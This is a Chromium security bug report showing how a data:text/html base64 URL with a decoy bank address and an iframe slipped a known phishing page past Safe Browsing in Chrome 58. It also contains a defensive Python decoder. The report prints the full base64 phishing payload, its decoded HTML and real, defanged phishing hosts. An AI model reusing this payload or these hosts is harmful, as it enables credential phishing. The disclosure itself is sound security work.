
Issue 726053


Issue metadata

Status: Duplicate
Merged: issue 594215
Owner: ----
Closed: May 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: Bypass of Google Safe Browsing in Chrome

Reported by huub.r...@gmail.com, May 24 2017

Issue description

VULNERABILITY DETAILS

Website builders, for example phishermen or malware coders, can easily BYPASS the Google Safe Browsing / Deceptive website warnings in Google Chrome using redirects to URLs based on data:text/html;base64 encoding with an iframe. While other browsers report an error, Google Chrome is showing the final URL embedded in the base64 encoding, even when this final URL is in the Safe Browsing database. Criminals are using this bug in the wild.

VERSION
Chrome Version: [58.0.3029.110] + [stable]
Operating System: [Windows 10 (64-bit) fully patched]

REPRODUCTION CASE

I was visiting a data:text/html;base64 based URL today. But you can test this with every reported phishing or malware site encoded within a data:text/html;base64 based URL.

The redirector found in a phishing mail hXXp://95.110.172.211/aW5mb0BzZXJqYW4tdmxvZXJlbi5ubA0=/indes.php?sdsdgsdgsdg

was redirecting to the URL 'data:text/html;https://www.ing.nl/particulier/index.html;base64,77u/DQoNCg0KDQoNCg0KDQoNCjxoZWFkPg0KCQ0KCTx0aXRsZT5JbmxvZ2dlbiBNaWpuIElORzwvdGl0bGU+DQo8Ym9keSBzdHlsZT0ibWFyZ2luOjBweDtwYWRkaW5nOjBweDtvdmVyZmxvdzpoaWRkZW4iPg0KICAgIDxpZnJhbWUgc3JjPSJodHRwOi8vbTJtLWVsZWt0cm9uaWsuY29tL2ltZy9hcHBzL3MvbmV3L2luZGV4MS5odG0iIGZyYW1lYm9yZGVyPSIwIiBzdHlsZT0ib3ZlcmZsb3c6aGlkZGVuO2hlaWdodDoxMDAlO3dpZHRoOjEwMCUiIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiPjwvaWZyYW1lPg0KPC9ib2R5Pg0KDQo8L2h0bWw+'

Which means you will be guided to:

Source:

<head>
	
	<title>Inloggen Mijn ING</title>
<body style="margin:0px;padding:0px;overflow:hidden">
    <iframe src="hXXp://m2m-elektronik.com/img/apps/s/new/index1.htm" frameborder="0" style="overflow:hidden;height:100%;width:100%" height="100%" width="100%"></iframe>
</body>

</html>

While hXXp://m2m-elektronik.com/img/apps/s/new/index1.htm was already in the Safe Browsing database. 

Chrome must show the 'Deceptive website warning' here, but the phishing site was clearly visible. Same problem appears in the Mobile browser version.

See attached files for examples.
 
Attachments:
NO Warning iframe base64.PNG (115 KB)
Warning website.PNG (38.0 KB)
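
For triage of redirects like the one in this report, the following added example (not part of the original report and not Chrome or Safe Browsing code) unwraps a data: URL and lists the URLs its document would load, so each can be checked against a reputation service. The function name `inspect_data_url`, the tag list and the sample hosts are assumptions made for illustration; the sample URL is constructed.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# Attributes that make a document load or post to another URL.
URL_ATTRS = {"iframe": "src", "frame": "src", "embed": "src",
             "script": "src", "object": "data", "form": "action"}

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        wanted = URL_ATTRS.get(tag)
        if wanted and attrs.get(wanted):
            self.urls.append((tag, attrs[wanted].strip()))
        # <meta http-equiv="refresh" content="0;url=..."> also navigates.
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            target = (attrs.get("content") or "").partition("=")[2]
            if target:
                self.urls.append(("meta-refresh", target.strip(" '\"")))

def inspect_data_url(url):
    """Return media type, decoy parameters and embedded URLs of a data: URL."""
    scheme, _, rest = url.strip().partition(":")
    if scheme.lower() != "data" or "," not in rest:
        raise ValueError("not a data: URL")
    header, _, payload = rest.partition(",")
    params = [p.strip() for p in header.split(";")]
    mediatype = params[0].lower() or "text/plain"
    raw = unquote_to_bytes(payload)
    if len(params) > 1 and params[-1].lower() == "base64":
        raw = b"".join(raw.split())  # tolerate whitespace inside the payload
        raw = base64.b64decode(raw + b"=" * (-len(raw) % 4))
    # A parameter that looks like a URL is not valid metadata; it only puts
    # a trusted-looking address in front of the user.
    decoys = [p for p in params[1:] if "//" in p]
    collector = _Collector()
    if mediatype in ("text/html", "application/xhtml+xml", "image/svg+xml"):
        collector.feed(raw.decode("utf-8-sig", errors="replace"))  # strips BOM
        collector.close()
    return {"mediatype": mediatype, "decoys": decoys, "embedded": collector.urls}

# Constructed sample with the same shape as the reported URL; hosts are placeholders.
_DOC = '\ufeff<head><title>Login</title><body><iframe src="http://phish.example.test/index1.htm"></iframe></body>'
SAMPLE = ("data:text/html;https://bank.example.test/index.html;base64,"
          + base64.b64encode(_DOC.encode("utf-8")).decode("ascii"))
```

Calling `inspect_data_url(SAMPLE)` returns the decoy address separately from the iframe target; the iframe target is the URL that needs the reputation lookup.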

Comment 1 by kenrb@chromium.org, May 24 2017

Mergedinto: 594215
Status: Duplicate (was: Unconfirmed)
Thanks for the report. This should be blocked as of Chrome 60, which is currently in Dev and Canary channels. It's a common source of problems, so top-level redirects or renderer-initiated navigations to data: URLs have been disabled.

Comment 2 by sheriffbot@chromium.org, Aug 31 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
